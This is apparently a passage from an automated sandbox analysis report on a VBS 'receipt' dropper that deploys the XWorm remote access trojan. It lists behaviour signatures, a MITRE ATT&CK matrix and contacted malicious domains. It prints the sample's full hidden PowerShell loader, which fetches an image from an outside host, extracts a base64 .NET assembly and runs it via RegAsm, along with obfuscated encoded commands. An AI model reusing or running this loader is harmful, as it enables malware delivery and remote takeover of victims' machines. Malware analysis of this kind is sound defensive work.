DgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'escudellar','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\escudellar.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'c:\programdata\' , 'escudellar','regasm',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'c:\programdata\' , 'escudellar','regasm',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2972228650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3896, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2972228650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3896, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	331 Scripting	Valid Accounts	1 Exploitation for Client Execution	331 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	2 Obfuscated Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	1 Office Application Startup	121 Registry Run Keys / Startup Folder	1 Software Packing	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	121 Registry Run Keys / Startup Folder	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	213 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
S847453-receipt.vbs	21%	ReversingLabs	Script-WScript.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\RegAsm.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://app01.system.com.br/RDWeb/Pages/login.aspxoG2	0%	Avira URL Cloud	safe
https://www.google.com;	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspxelp_	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspxW	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
xwormay8450.duckdns.org	0%	Avira URL Cloud	safe
https://www.evolve27.com/nm/xwomay.txt	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspxd	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
https://pastzangam.zangamzangam/d/Pz7Nj	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	0%	Avira URL Cloud	safe
https://pastzangam.zangamzangam/d/Pz7NjC	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
evolve27.com	131.153.147.50	true	true	unknown
xwormay8450.duckdns.org	12.221.146.138	true	true	unknown
paste.ee	172.67.187.200	true	false	high
uploaddeimagens.com.br	104.21.45.138	true	true	unknown
www.evolve27.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/d/Pz7Nj	false		high
https://www.evolve27.com/nm/xwomay.txt	true	Avira URL Cloud: safe	unknown
xwormay8450.duckdns.org	true	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://app01.system.com.br/RDWeb/Pages/login.aspxoG2	wscript.exe, 00000000.00000002.1885341405.000001A85E53D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878557421.000001A85E53C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.2642487198.000001C590071000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastzangam.zangamzangam/d/Pz7Nj	wscript.exe, 00000000.00000003.1666302244.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879538877.000001A85E509000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856696221.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879196524.000001A85E4ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1855839456.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665749382.000001A860230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1666634236.000001A86022A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665816178.000001A85E509000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665865168.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1666264631.000001A860224000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1877954656.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879515265.000001A860250000.00000004.00000020.00020000.00000000.sdmp, S847453-receipt.vbs	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2281228806.000001C580223000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://app01.system.com.br/RDWeb/Pages/login.aspxelp_	wscript.exe, 00000000.00000003.1666634236.000001A86022A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1666264631.000001A860224000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2281228806.000001C580223000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000007.00000002.2642487198.000001C590071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com;	wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2642487198.000001C590071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
